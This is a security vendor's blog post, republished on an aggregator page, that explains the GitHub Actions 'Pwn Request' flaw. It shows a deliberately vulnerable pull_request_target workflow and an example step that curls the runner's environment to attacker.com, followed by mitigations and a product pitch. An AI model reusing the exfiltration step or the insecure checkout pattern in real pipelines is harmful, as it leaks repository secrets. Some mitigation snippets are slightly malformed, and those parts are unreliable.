惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

Cisco Talos Blog
Cisco Talos Blog
K
Kaspersky official blog
T
The Exploit Database - CXSecurity.com
NISL@THU
NISL@THU
AWS News Blog
AWS News Blog
V2EX - 技术
V2EX - 技术
Google DeepMind News
Google DeepMind News
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
S
Security @ Cisco Blogs
让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com
Recent Commits to openclaw:main
Recent Commits to openclaw:main
J
Java Code Geeks
Microsoft Azure Blog
Microsoft Azure Blog
Attack and Defense Labs
Attack and Defense Labs
Jina AI
Jina AI
The Last Watchdog
The Last Watchdog
W
WeLiveSecurity
H
Help Net Security
V
Visual Studio Blog
宝玉的分享
宝玉的分享
C
Cybersecurity and Infrastructure Security Agency CISA
T
Threat Research - Cisco Blogs
IT之家
IT之家
Hugging Face - Blog
Hugging Face - Blog
Latest news
Latest news
T
Tor Project blog
I
Intezer
美团技术团队
GbyAI
GbyAI
T
Tailwind CSS Blog
Last Week in AI
Last Week in AI
博客园 - 三生石上(FineUI控件)
Google DeepMind News
Google DeepMind News
Scott Helme
Scott Helme
Y
Y Combinator Blog
博客园 - 司徒正美
T
Tenable Blog
O
OpenAI News
N
News and Events Feed by Topic
cs.CL updates on arXiv.org
cs.CL updates on arXiv.org
V
Vulnerabilities – Threatpost
P
Palo Alto Networks Blog
博客园 - 聂微东
酷 壳 – CoolShell
酷 壳 – CoolShell
D
Darknet – Hacking Tools, Hacker News & Cyber Security
T
Threatpost
Google Online Security Blog
Google Online Security Blog
Apple Machine Learning Research
Apple Machine Learning Research
云风的 BLOG
云风的 BLOG
Help Net Security
Help Net Security

Step Security Blog

Announcing Dependabot Configuration Enhancements: Cooldown and Group Support - StepSecurity Securing Vibe Coding and AI Coding Agents: An End-to-End Approach with StepSecurity - StepSecurity Introducing StepSecurity Dev Machine Guard: Protecting Developer Machines from Supply Chain Attacks - StepSecurity Top 2024 Predictions for CI/CD Security - StepSecurity Dev Machine Guard Is Now Open Source: See What's Really Running on Your Developer Machine - StepSecurity Datadog's DevSecOps 2026 Report Validates What We've Been Building - StepSecurity hackerbot-claw: An AI-Powered Bot Actively Exploiting GitHub Actions - Microsoft, DataDog, and CNCF Projects Hit So Far - StepSecurity Cline Supply Chain Attack Detected: cline@2.3.0 Silently Installs OpenClaw - StepSecurity StepSecurity’s Unified Protection Across the SDLC Infrastructure Threat Framework (SITF) - StepSecurity @velora-dex/sdk Compromised on npm: Malicious Version Drops macOS Backdoor via launchctl Persistence - StepSecurity axios Compromised on npm - Malicious Versions Drop Remote Access Trojan - StepSecurity Behind the Scenes: How StepSecurity Detected and Helped Remediate the Largest npm Supply Chain Attack - StepSecurity 10 Layers Deep: How StepSecurity Stops TeamPCP's Trivy Supply Chain Attack on GitHub Actions - StepSecurity Malicious IoliteLabs VSCode Extensions Target Solidity Developers on Windows, macOS, and Linux with Backdoor - StepSecurity TeamPCP Plants WAV Steganography Credential Stealer in telnyx PyPI Package - StepSecurity litellm: Credential Stealer Hidden in PyPI Wheel - StepSecurity Checkmarx KICS GitHub Action Compromised: Malware Injected in All Git Tags - StepSecurity CanisterWorm: How a Self-Propagating npm Worm Is Spreading Backdoors Across the Ecosystem - StepSecurity Trivy Compromised a Second Time - Malicious v0.69.4 Release, aquasecurity/setup-trivy, aquasecurity/trivy-action GitHub Actions Compromised - StepSecurity bittensor-wallet 4.0.2 Compromised on PyPI - Backdoor Exfiltrates Private Keys - StepSecurity Malicious npm Releases Found in Popular React Native Packages - 130K+ Monthly Downloads Compromised - StepSecurity Malicious Polymarket Bot Hides in Hijacked dev-protocol GitHub Org and Steals Wallet Keys - StepSecurity ForceMemo: Hundreds of GitHub Python Repos Compromised via Account Takeover and Force-Push - StepSecurity xygeni-action Compromised: C2 Reverse Shell Backdoor Injected via Tag Poisoning - StepSecurity kubernetes-el Compromised: How a Pwn Request Exploited a Popular Emacs Package - StepSecurity How StepSecurity Caught a Release Storm in Microsoft’s @types Packages - StepSecurity Harden Runner Now Supports Windows and macOS GitHub Actions Runners - StepSecurity 10,000 Open-Source Projects Now Secured by Harden-Runner Community-Tier: A Milestone Three Years in the Making - StepSecurity 20+ Popular NPM Packages Compromised (Chalk, Debug, Strip-ANSI, Color-Convert, Wrap-ANSI...) - StepSecurity 2024 in Review: The Evolution of CI/CD Security & What's Next - StepSecurity How to Use Docker in Actions Runner Controller (ARC) Runners Securely - StepSecurity Celebrating 1000 Repositories Secured with Harden Runner: A Journey of Growth and Collaboration - StepSecurity StepSecurity Detects Early Supply Chain Risk Signals in kilocode npm - StepSecurity Another npm Supply Chain Attack: The 'is' Package Compromise - StepSecurity anthropics/claude-code-action Security: How to Secure Claude Code in GitHub Actions with Harden-Runner - StepSecurity Harden-Runner detection: tj-actions/changed-files action is compromised - StepSecurity StepSecurity's Catalog of Fixes - StepSecurity Orchestrating Security: StepSecurity's Impact on 400+ Repositories and Future Plans - StepSecurity Announcing Anomalous Outbound Call Detection Using Machine Learning - StepSecurity Announcing GitHub Actions Advisor and StepSecurity Maintained Actions - StepSecurity Analysis of Backdoored XZ Utils Build Process with Harden-Runner - StepSecurity Announcing General Availability of Harden Runner - StepSecurity Milestone Achieved: 2500+ Public Repositories Secured with Harden-Runner - StepSecurity Build secretless CI/CD pipelines using wait-for-secrets - StepSecurity Introducing Apps & PATs: Centralized Visibility for GitHub Apps and Personal Access Tokens - StepSecurity CVE-2026-22709: Critical Sandbox Escape Vulnerability in vm2 - StepSecurity StepSecurity Now Supports Dark Mode - StepSecurity 2025 in Review: The Evolution of Supply Chain Security & What's Next - StepSecurity Bake Harden-Runner Into GitHub's Custom Runner Images for Organization-Wide CI/CD Security - StepSecurity StepSecurity Is Now Available on Azure Marketplace - StepSecurity Critical Remote Code Execution Vulnerabilities Discovered in React Server Components and Next.js - StepSecurity How Harden Runner Detected the Sha1-Hulud Supply Chain Attack in CNCF's Backstage Repository - StepSecurity Sha1-Hulud: The Second Coming - Zapier, ENS Domains, and Other Prominent NPM Packages Compromised - StepSecurity Supply Chain Security Alert: eslint-config-prettier Package Shows Signs of Compromise - StepSecurity 9,000 Open-Source Projects Now Secured by Harden-Runner - StepSecurity Shai-Hulud: Self-Replicating Worm Compromises 500+ NPM Packages - StepSecurity Introducing npm Package Search: Find Where Any Package Was Introduced Across Your GitHub Organizations - StepSecurity StepSecurity Is Sponsoring GitHub Universe 2025 - StepSecurity s1ngularity: Popular Nx Build System Package Compromised with Data-Stealing Malware - StepSecurity Introducing StepSecurity Threat Intelligence: Real-Time Supply Chain Attack Alerts for Your SIEM - StepSecurity 8,000 Strong: Harden-Runner's Growing Impact on CI/CD Security - StepSecurity Securing Google Gemini in GitHub Actions with Harden-Runner - StepSecurity GhostAction Campaign: Over 3,000 Secrets Stolen Through Malicious GitHub Workflows - StepSecurity Introducing the NPM Package Cooldown Check - StepSecurity Securing GitHub Copilot in GitHub Actions with Harden-Runner - StepSecurity Calculate Your CI/CD Security ROI with StepSecurity's New ROI Calculator - StepSecurity How StepSecurity Harden Runner Detected Unexpected Microsoft Defender Installation on GitHub-hosted Ubuntu Runners - StepSecurity StepSecurity Harden Runner: Detect source code tampering during the build process - StepSecurity Suspicious Tag Movement in AWS’s GitHub Action: What Happened and Why It Matters - StepSecurity When 'Changed Files' Changed Everything: Our Black Hat 2025 Presentation on the tj-actions Supply Chain Breach - StepSecurity Lessons from AWS CodeBuild’s Memory-Dump Incident (CVE-2025-8217) - StepSecurity Supply Chain Security Alert: num2words PyPI Package Shows Signs of Compromise - StepSecurity When AI Meets CI/CD: Coding Agents in GitHub Actions Pose Hidden Security Risks - StepSecurity The GitHub Warning Everyone Ignores: 'This Commit Does Not Belong to Any Branch' - StepSecurity 8 GitHub Actions Secrets Management Best Practices to Follow - StepSecurity reviewdog GitHub Actions are compromised - StepSecurity 7,000 Open-Source Projects Now Secured by Harden-Runner - StepSecurity Replace Third-Party Actions with StepSecurity Maintained Actions via Automated Pull Requests - StepSecurity StepSecurity Is Now Available on AWS Marketplace - StepSecurity Introducing StepSecurity Artifact Monitor: Detect Unauthorized Software Releases in minutes, not months - StepSecurity Introducing Workflow Run Policies: Guardrails for Blocking Non-Compliant GitHub Actions Runs - StepSecurity Harden-Runner Detects New Traffic to release-assets.githubusercontent.com Across Multiple Customers - StepSecurity Grafana GitHub Actions Security Incident - StepSecurity Export Harden-Runner Security Insights and Detections to Amazon S3 - StepSecurity Evolving Harden-Runner’s disable-sudo Policy for Improved Runner Security - StepSecurity Announcing Policy-Driven Automated Pull Requests for CI/CD Misconfiguration Remediation - StepSecurity Announcing StepSecurity’s Integration with RunsOn: Secure and Optimized CI/CD Pipelines - StepSecurity Secure Repo Just Got Better: New Features for GitHub Actions Security Best Practices - StepSecurity Why Compliance Auditors Are Looking at Your CI/CD Runners - And How to Prepare - StepSecurity Harden-Runner Flags Anomalous Outbound Call, Leading to Docker Documentation Update - StepSecurity StepSecurity Harden-Runner Now Secures GitHub Actions Workflows for Over 5,000 Open Source Projects - StepSecurity Prevent Ultralytics Style CI/CD Security Attacks with Network Security Controls - StepSecurity PyTorch Supply Chain Compromise - StepSecurity Unified Network Egress View: Centralize GitHub Actions Network Destinations for Your Enterprise - StepSecurity Uniting Developers and Security: Celebrating the Success of 500+ Open Source Projects Using StepSecurity's Orchestration Platform - StepSecurity 5 Effective Third-Party GitHub Actions Governance Best Practices - StepSecurity StepSecurity Recognized Among CRN’s "10 Hottest DevOps Startups Of 2024" - StepSecurity Streamline Your GitHub Actions Workflows with StepSecurity’s Latest Feature - StepSecurity StepSecurity Steps Up the Security Game with SOC 2 Type 2 Compliance - StepSecurity StepSecurity's Alignment with CISA's CI/CD Security Guidance - StepSecurity
GitHub Actions Pwn Request Vulnerability - StepSecurity
2025-07-08 · via Step Security Blog

GitHub Actions allows developers to automate workflows within GitHub. This helps to simplify Continuous Integration and Continuous Deployment (CI/CD) pipelines and other automation tasks. However, these actions can be exploited through vulnerabilities. One such vulnerability is the "Pwn Request."

This article covers the "Pwn Request" vulnerability, its impact, and provides practical steps to help you secure your workflows against such threats. 

What is a “Pwn Request”?

The 'Pwn Request' vulnerability exposes flaws in how workflows handle pull requests or contributions from external sources. If these workflows are not properly monitored or managed, it can cause data breaches.

Attackers can manipulate pull requests to exploit vulnerabilities. This manipulation is used to get unauthorized access, execute harmful actions, or compromise sensitive information. 

The term “pwn” was adopted by the cybersecurity community to explain unauthorized access to a system or account. Based on this, attackers can "pwn" the workflow by making it perform actions it shouldn’t. 

Pwn request impacts GitHub Actions security by causing security breaches, supply chain attacks and secrets exposure. 

Risky Triggers in GitHub Actions Workflows

Certain triggers in GitHub Actions workflows pose a higher risk and can lead to vulnerabilities if not managed properly. These triggers are particularly risky because they execute workflows in ways that may allow attackers to exploit them. Below is a list of risky triggers:

  • pull_request_target
  • workflow_run
  • issue_comment
  • issues
  • discussion_comment
  • discussion
  • fork
  • watch

Why These Triggers Are Risky

  1. pull_request_target:
    This trigger allows workflows to run with elevated privileges, even for pull requests from forked repositories. Attackers can exploit this by injecting malicious code into their pull request.
  2. workflow_run:
    This trigger can be exploited when a workflow is triggered by another workflow. Attackers can chain workflows to perform unintended actions.
  3. issue_comment and issues:
    These triggers allow workflows to run in response to comments or issues raised in a repository. Attackers can use these events to execute workflows with unintended consequences.
  4. discussion_comment and discussion:
    Similar to issue-related triggers, these can allow malicious actors to exploit workflows by crafting events that execute sensitive actions.
  5. fork:
    Workflows triggered by forked repositories often grant access to sensitive resources, such as secrets. Attackers can use forks to escalate their privileges and exploit the main repository.
  6. watch:
    Triggers based on watch events can be abused for unnecessary workflow executions, causing resource exhaustion or indirect exploitation.

Key Features of the Vulnerability

  1. Pull Request Exploitation: Attackers exploit workflows triggered by pull requests from forked repositories.
  2. Default Permissions: Permissions to pull requests are regularly exploited. Unnecessary permissions give unauthorized access to secrets or repository data.
  3. Large-Scale Impact: Vulnerabilities in popular open-source repositories could lead to major data breaches.

Demonstrating the "Pwn Request" Vulnerability

Setting Up a Vulnerable Workflow

The code below shows how "Pwn Request" works. This is done by using a vulnerable GitHub Actions workflow. The code uses a sample YAML file illustrating a scenario. 

name: CI
on:
  push:
    branches: main
  pull_request_target:
    branches: main
  workflow_dispatch:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout code
        uses: actions/checkout@v4
        with:
          fetch-depth: 0
          ref: ${{github.event.pull_request.head.ref}}
          repository: ${{github.event.pull_request.head.repo.full_name}}

      - name: Using Node.js 20.x
        uses: actions/setup-node@v3
        with: 
            node-version: 20
      - name: Clean Install
        run: npm ci
      - name: Build
        run: npm run build:release
     
      - name: Run a one-line script
        run: echo Hello, world!

Key Issues

  1. Triggered by pull_request_target: The trigger option allows workflows to run for pull requests from forked repositories. This makes the workflow vulnerable as triggers are risky and should be used with caution. 
  2. Checkout Vulnerability: The workflow checks out the pull request’s head ref and repository. This could give an attacker access to modify the workflow files and inject malicious code into the repository. 
  3. Node.js Setup and NPM Command: Running npm and node.js older versions have vulnerabilities. Running npm directly from untrusted code can be used to manipulate code by attackers. 

Exploitation Process

This highlights in detail how attackers exploit vulnerable workflow.

  1. Fork the Target Repository

The term ‘fork’ in Git is the process of creating a personal copy of someone’s repository on your GitHub account. In this case, the attacker forks a repository with the vulnerable workflow.

  1. Create a Malicious Pull Request
    The next step an attacker does is to modify files or add scripts in the fork to execute malicious code. A pull request is then submitted to the main repository.

Merged pull request displaying the conversation and commit details of a merged pull request, which may have bypassed proper security checks

Merged pull request displaying the conversation and commit details of a merged pull request, which may have bypassed proper security checks
  1. Trigger the Workflow:
    The vulnerable workflow runs the malicious code during the build or test stage.

Image demonstrating a malicious script injected into the workflow, designed to exfiltrate secrets via a POST request

Demonstrating a malicious script injected into the workflow, designed to exfiltrate secrets via a POST request

  1. Gain Unauthorized Access:
    Once the changes are merged and the code runs, attackers can gain access with the default permission. Attackers can get to access repository secrets or modify data, and the code runs.

Pull Request details displaying the merge status and lack of proper validation for a potentially malicious contribution

Pull Request details displaying the merge status and lack of proper validation for a potentially malicious contribution

Example Malicious Pull Request

There are various types of malicious codes injected in a pull request. Some attempt to steal secrets, modify files and install malware or spyware. The sole aim is to steal data.

This code below shows an example of a malicious pull request with an attempt to steal secrets in a GitHub repository.

- name: Steal GitHub Secrets
  run: |
    curl -X POST -H "Content-Type: application/json" \
    -d "{\"secrets\": \"$(env)\"}" \
    https://attacker.com/steal-secrets

Analysis of the Vulnerability

Why Workflows are Vulnerable

  1. Default Permissions: Many workflows grant write access to the repository. This permissions give external contributors access to write and edit files directly.
  2. Lack of Validation: Pull request triggers cannot differentiate between trusted and untrusted sources.
  3. Automation Risks: Heavy reliance on CI/CD pipelines to automate tasks increases the rate of vulnerabilities.

Impact of the Exploit

The consequences of a successful exploit include:

  • Compromised Repositories: Attackers can exfiltrate sensitive data or inject malicious code. This can lead to loss of sensitive data and codebase of apps, softwares, and major projects. 
  • Production Environment Breaches: In cases where production deployments are automated, this leads to breaches. Breaches cause a whole lot of damage to companies. These includes lack of trust from customers, loss of data and money, and even lawsuits. 
  • Widespread Dependencies Risk: Vulnerabilities in popular repositories can spread to dependent projects.

Mitigation Strategies

Best Practices for Securing Workflows

  1. Restrict Permissions: Use the principle of least privilege. For example, configure the workflow with read-only access. Permit write access to only trusted contributors.
-permissions:  
  contents: read

  1. Validate Pull Requests: Add manual approval steps for pull request triggered workflows.
-jobs:
  build:
    if: ${{ github.actor != 'dependabot[bot]' }}

  1. Disable Unnecessary Triggers: Avoid triggering workflows for pull requests from forked repositories.
  2. Review Codes: It is essential to review codes thoroughly before merging. Schedule a certain time to regularly audit codes to ensure maximum security.
  3. Tools and Techniques: Use security tools for your workflows. Use the GitHub Token for authentication and authorization. Also, StepSecurity has extensive features and tools to secure your GitHub Actions. StepSecurity is an essential and must-have tool to improve workflow security.

Try StepSecurity for Free

How StepSecurity Helps to Secure your Workflows

StepSecurity is a state-of-the-art security platform designed to fortify the security of software development workflows. It focuses on safeguarding CI/CD pipelines by leveraging automated tools and best practices to detect vulnerabilities, mitigate supply chain threats, and ensure compliance. Here’s how StepSecurity effectively prevents "Pwn Request"-style vulnerabilities:

  1. Vulnerability Scanning: StepSecurity scans workflows across your organization to identify vulnerabilities that could lead to exploits, such as the risky pull_request_target trigger. As shown in the screenshot below, StepSecurity highlights risky configurations and displays them on an intuitive dashboard. By clicking on the flagged controls, you can view detailed insights about the affected repository, the vulnerable workflows, and the risky triggers in question.

Highlighting compliance controls, including the 'Pwn Request Vulnerability' check, with critical and high severity findings

Highlighting compliance controls, including the 'Pwn Request Vulnerability' check, with critical and high severity findings

Detailed StepSecurity dashboard report highlighting the 'Pwn Request Vulnerability'

Detailed StepSecurity dashboard report highlighting the 'Pwn Request Vulnerability'
  1. Credential Exfiltration Prevention: StepSecurity’s Harden-Runner adds network egress control and runtime security, preventing sensitive data like GitHub tokens from being exfiltrated by malicious code. This feature has proven effective, detecting exfiltration attempts in projects like Google’s open-source Flank.
  2. Restrict Permissions on GitHub Tokens: StepSecurity enables you to audit and manage GitHub tokens in your organization. It identifies tokens with read/write permissions that could pose a security risk. As shown in the screenshot below, the platform provides a 'Fix PR' button, allowing you to adjust token permissions with a single click, ensuring adherence to the principle of least privilege.

StepSecurity dashboard highlighting failed compliance checks for GitHub Token Permissions

StepSecurity dashboard highlighting failed compliance checks for GitHub Token Permissions

Detailed StepSecurity dashboard report highlighting a repository with a GitHub Token configured with read/write permissions and a suggested fix PR option for enhanced security

Detailed StepSecurity dashboard report highlighting a repository with a GitHub Token configured with read/write permissions and a suggested fix PR option for enhanced security

Conclusion

The "Pwn Request" vulnerability underscores the importance of securing GitHub Actions workflows. Without proper controls, these workflows are at risk of exploitation, leading to data breaches and compromised repositories. Tools like StepSecurity provide critical protection through features like vulnerability scanning and credential exfiltration prevention, ensuring workflows are secure from modern threats. Safeguard your pipelines today to prevent attacks tomorrow.

Ready to secure your workflows? Start your free trial of StepSecurity and experience its powerful features for yourself